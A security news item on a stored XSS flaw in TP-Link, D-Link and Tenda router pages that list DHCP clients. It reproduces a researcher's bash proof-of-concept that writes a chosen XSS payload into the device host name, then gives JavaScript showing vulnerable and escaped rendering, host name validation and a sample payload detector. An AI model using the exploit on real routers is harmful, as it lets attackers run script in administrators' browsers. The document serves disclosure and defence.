Millions of routers manufactured by TP-Link, D-Link and Tenda are vulnerable to a DHCP-based cross-site scripting (XSS) flaw in the main admin section that displays the connected DHCP client list.
An attacker can set the DHCP host name of their own device to an XSS payload, which the router then stores and injects into its client list page.
The attack vector fires when an administrator views the connected DHCP clients: the router renders the stored host name without any output encoding or secure parsing, so the XSS payload executes in the administrator's browser.
Lawrence Amer, a researcher at Vulnerability Lab, disclosed a proof-of-concept exploit for reproducing the issue, together with a video showing the real impact.
Exploit PoC:
#!/bin/bash
# Colour codes for the prompt output
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
RESET=$(tput sgr0)
echo "${BLUE}[+] Persistent XSS DHCP Exploiter via Routers${RESET}"
echo "${GREEN}[+] Vulnerability found by: Lawrence Amer${RESET}"
echo -n "${BLUE}[~] Type XSS payload here: ${RESET}"
# -r keeps backslashes literal; -e enables readline editing (bash-specific)
read -r -e xss
# Writing /etc/hostname requires root; this is the name the DHCP client announces to the router
echo "$xss" > /etc/hostname
echo "${GREEN}[+] DHCP HOST NAME IS WRITTEN${RESET}"
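The root cause above is that the router's client list page concatenates the attacker-supplied DHCP host name straight into HTML. The following JavaScript is an added example written for this page (it is not code from the advisory, from Vulnerability Lab, or from any vendor firmware) that shows the vulnerable rendering pattern next to a hardened one, plus two defensive checks a router or its monitoring could apply: validating host names against RFC 1123 label rules before storing them, and flagging leases whose host name contains markup characters. The lease table, MAC addresses and the payload string are constructed sample data; the function names are my own.

```javascript
// Added example, not part of the original advisory or any vendor's firmware.
// Host names arrive over DHCP (option 12) and are attacker-controlled input.

// Constructed sample lease table, shaped like what a router's DHCP server holds.
// The third entry carries a constructed HTML payload of the kind the advisory describes.
const SAMPLE_LEASES = [
  { mac: "00:11:22:33:44:55", ip: "192.168.0.10", hostname: "laptop" },
  { mac: "66:77:88:99:aa:bb", ip: "192.168.0.11", hostname: "my-phone" },
  { mac: "cc:dd:ee:ff:00:11", ip: "192.168.0.12", hostname: "<img src=x onerror=alert(1)>" },
];

// RFC 1123 host name label: letters, digits and hyphens, 1-63 characters,
// no leading or trailing hyphen. Anything else is rejected.
const HOSTNAME_RE = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;

function isValidHostname(name) {
  return HOSTNAME_RE.test(String(name));
}

// Escape the five characters that matter in HTML text and quoted attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: fields are concatenated into markup unencoded.
// This is how the affected client list pages behave.
function renderClientListUnsafe(leases) {
  const rows = leases.map(
    (l) => `<tr><td>${l.hostname}</td><td>${l.ip}</td><td>${l.mac}</td></tr>`
  );
  return "<table>" + rows.join("") + "</table>";
}

// Hardened pattern: every field is HTML-escaped before it reaches the markup,
// so a host name can only ever appear as visible text.
function renderClientListSafe(leases) {
  const rows = leases.map(
    (l) =>
      `<tr><td>${escapeHtml(l.hostname)}</td>` +
      `<td>${escapeHtml(l.ip)}</td><td>${escapeHtml(l.mac)}</td></tr>`
  );
  return "<table>" + rows.join("") + "</table>";
}

// Second layer, applied where the DHCP server stores the lease: keep only names
// that pass validation and replace the rest with a neutral placeholder so the
// lease itself still shows up in the UI.
function sanitizeLeases(leases) {
  return leases.map((l) => ({
    ...l,
    hostname: isValidHostname(l.hostname) ? l.hostname : "(invalid-hostname)",
  }));
}

// Detection helper for lease-log review: return the MACs of clients whose
// announced host name contains characters that have meaning in HTML.
function findSuspiciousHostnames(leases) {
  return leases.filter((l) => /[<>"'&]/.test(l.hostname)).map((l) => l.mac);
}

// Stand-alone demonstration
console.log("unsafe:", renderClientListUnsafe(SAMPLE_LEASES));
console.log("safe:  ", renderClientListSafe(SAMPLE_LEASES));
console.log("suspicious MACs:", findSuspiciousHostnames(SAMPLE_LEASES));
```

Output encoding on the page (renderClientListSafe) is the fix that actually closes the hole, because it does not depend on what the DHCP server accepts; the host name validation and the suspicious-name check are defence in depth and a cheap detection signal, since a legitimate client has no reason to announce a name containing `<`, `>` or quotes.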